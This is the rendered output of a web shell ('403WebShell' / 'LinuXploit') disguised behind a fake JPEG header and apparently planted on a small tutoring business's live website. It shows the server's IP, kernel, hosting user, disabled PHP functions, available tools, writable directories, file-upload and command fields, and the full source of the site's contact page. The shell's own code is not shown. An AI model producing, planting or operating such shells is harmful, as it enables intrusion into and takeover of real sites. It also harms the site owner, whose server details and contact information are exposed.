���� JFIF    aewtgwgerwasdasd403WebShell
403Webshell
Server IP : 147.93.80.58  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User : u939086737 ( 939086737)
PHP Version : 8.2.28
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u939086737/domains/mishrahometutor.in/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u939086737/domains/mishrahometutor.in/public_html/contact.php
<?php
ini_set('session.cookie_secure', '1'); // Send cookie only over HTTPS
ini_set('session.cookie_httponly', '1'); // Prevent JavaScript access to session cookie
ini_set('session.use_strict_mode', '1'); // Reject uninitialized session IDs
ini_set('session.cookie_samesite', 'Strict'); // Prevent cross-site request
session_start();
include './action/config.php';
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <!-- Google Tag Manager -->
    <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
    j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-W8DS3GQV');</script>
    <!-- End Google Tag Manager -->
    <meta charset="utf-8">
    <title>Contact Us | Mishra Home Tutor</title>
    <meta name="description" content="Get in touch with Mishra Home Tutor. Contact us via phone at +91-829 254 6431 or email at visheshmishra0010@gmail.com. Visit us at Adalhatu Rd, near Manya Palace, Sarai Tand, Tetartoli, Morabadi, Ranchi, Jharkhand 834008.">
    <meta name="keywords" content="Mishra Home Tutor, Home Tutor, Home Tuition, Home Tuition in Ranchi, Home Tutor in Ranchi">
    <meta property="og:title" content="Contact Us | Mishra Home Tutor">
    <meta property="og:description" content="Reach out to Mishra Home Tutor via phone or email. Visit us at our Ranchi location.">
    <meta property="og:url" content="https://mishrahometutor.in/contact">
    <meta property="og:type" content="website">
    <meta name="robots" content="index, follow">
    <meta name="author" content="Vishesh Mishra">
    <meta name="theme-color" content="#007BFF">
    <link rel="canonical" href="https://mishrahometutor.in/contact">
    <meta name="msapplication-config" content="assets/images/favicon/sitemap.xml">
    <meta property="og:image" content="https://mishrahometutor.in/assets/images/mishra-home-tutor.jpeg">
    <meta property="og:image:alt" content="Mishra Home Tutor">
    <meta property="og:locale" content="en_IN">
    <meta property="og:site_name" content="Mishra Home Tutor">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Contact Us | Mishra Home Tutor">
    <meta name="twitter:description" content="Get in touch with Mishra Home Tutor via phone or email. Visit our Ranchi location.">
    <meta name="twitter:image" content="https://mishrahometutor.in/assets/images/mishra-home-tutor.jpeg">

    <!-- mobile responsive meta -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <!-- ** Plugins Needed for the Project ** -->
    <link rel="stylesheet" href="vendors/bootstrap/bootstrap.min.css">
    <link rel="stylesheet" href="vendors/fontawesome/css/all.min.css">
    <link rel="stylesheet" href="vendors/jquery-nice-select/nice-select.css">
    <link rel="stylesheet" href="vendors/OwlCarousel2/owl.carousel.min.css">
    <link rel="stylesheet" href="vendors/magnific-popup/css/magnific-popup.css">
    <!-- Main Stylesheet -->
    <link href="assets/css/style.css" rel="stylesheet">
    <!--Favicon-->
    <link rel="shortcut icon" href="assets/images/favicon.png" type="image/png">
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
</head>

<body id="top">
    <!-- Google Tag Manager (noscript) -->
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W8DS3GQV"
    height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
    <!-- End Google Tag Manager (noscript) -->

    <?php include './header.php' ?>

    <!-- start of page-header -->
    <section class="page-header bg-cover has-overlay" style="background-image: url(assets/images/page-header-02.jpg)">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center">
                    <h2 class="section-title text-white font-weight-bold mb-20">Contact Us</h2>
                    <nav aria-label="breadcrumb">
                        <ol class="breadcrumb bg-transparent justify-content-center p-0 font-weight-600 mb-0">
                            <li class="breadcrumb-item active" aria-current="page"><a href="index.html">Home</a></li>
                            <li class="breadcrumb-item">Contact Us</li>
                        </ol>
                    </nav>
                </div>
            </div>
        </div>
    </section>
    <!-- end of page-header -->


    <!-- start of contact section -->
    <section class="section-padding bg-gray">
        <div class="container">
            <div class="row justify-content-between">
                <div class="col-lg-7 order-1 order-lg-0">
                    <div class="mb-5">
                        <h2 class="text-secondary font-weight-bold mb-2">Send a Message</h2>
                        <p>Your email address will not be published. <br> Required fields are marked.</p>
                    </div>
                    <form method="post">
                        <div class="row">
                            <div class="col-md-6 mb-3">
                                <input type="text" name="name" class="form-control rounded-sm" placeholder="Name *" required>
                            </div>
                            <div class="col-md-6 mb-3">
                                <input type="text" name="phone" class="form-control rounded-sm" placeholder="Mobile *" required>
                            </div>
                            <div class="col-md-12 mb-3">
                                <input type="email" name="email" class="form-control rounded-sm" id="email" placeholder="Email *" required>
                            </div>
                            <div class="col-md-12 mb-3">
                                <input type="text" name="subject" class="form-control rounded-sm" id="sub" placeholder="Subject">
                            </div>
                            <div class="col-md-12 mb-3">
                                <textarea name="message" class="form-control rounded-sm" placeholder="Message" rows="4"></textarea>
                            </div>
                            <!-- Google reCAPTCHA -->
                            <div class="col-md-12 mb-3">
                                <div class="g-recaptcha" data-sitekey="6Ld-rg8pAAAAAKzJJGweNKLrSMOX1ZWERxJFQi6R"></div>
                            </div>
                            <div class="col-md-12">
                                <button type="submit" name="contact_form_msg" class="btn btn-primary rounded-sm">Send Message</button>
                            </div>
                        </div>
                    </form>
                </div>

                <div class="col-xl-4 col-lg-5 mb-5 mb-lg-0 order-0 order-lg-1">
                    <div class="mb-5">
                        <h2 class="text-secondary font-weight-bold mb-2">Contact Info</h2>
                        <p>Welcome to our Website. <br> We are glad to have you around.</p>
                    </div>
                    <div class="shadow-sm p-20 mt-4 rounded-sm bg-white d-block d-sm-flex align-items-center">
                        <i class="fas fa-envelope fa-2x text-primary"></i>
                        <div class="ml-sm-4 mt-3 mt-sm-0">
                            <h4 class="text-secondary font-weight-600 mb-1">Contact Details</h4>
                            <p><a href="tel:+918292546431" class="text-dark"><i class="fa fa-phone" style="rotate: 92deg;"></i> +91-829 254 6431</a></p>
                            <p><a href="mailto:visheshmishra0010@gmail.com" class="text-dark">visheshmishra0010@gmail.com</a></p>
                        </div>
                    </div>
                    <div class="shadow-sm p-20 mt-4 rounded-sm bg-white d-block d-sm-flex align-items-center">
                        <i class="fas fa-map-marked-alt fa-2x text-primary"></i>
                        <div class="ml-sm-4 mt-3 mt-sm-0">
                            <h4 class="text-secondary font-weight-600 mb-1">Location</h4>
                            <p>Adalhatu Rd, near Manya Palace, Sarai Tand, Tetartoli, Morabadi, Ranchi, Jharkhand 834008</p>
                            
                        </div>
                    </div>
                    <div class="shadow-sm p-20 mt-4 rounded-sm bg-white d-block d-sm-flex align-items-center">
                        <i class="fas fa-user-clock fa-2x text-primary"></i>
                        <div class="ml-sm-4 mt-3 mt-sm-0">
                            <h4 class="text-secondary font-weight-600 mb-1">Opening Hours</h4>
                            <p>Monday-Saturday</p>
                            <p>8:00 AM - 7:00 PM</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!-- end of contact section -->



    <?php include './footer.php' ?>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit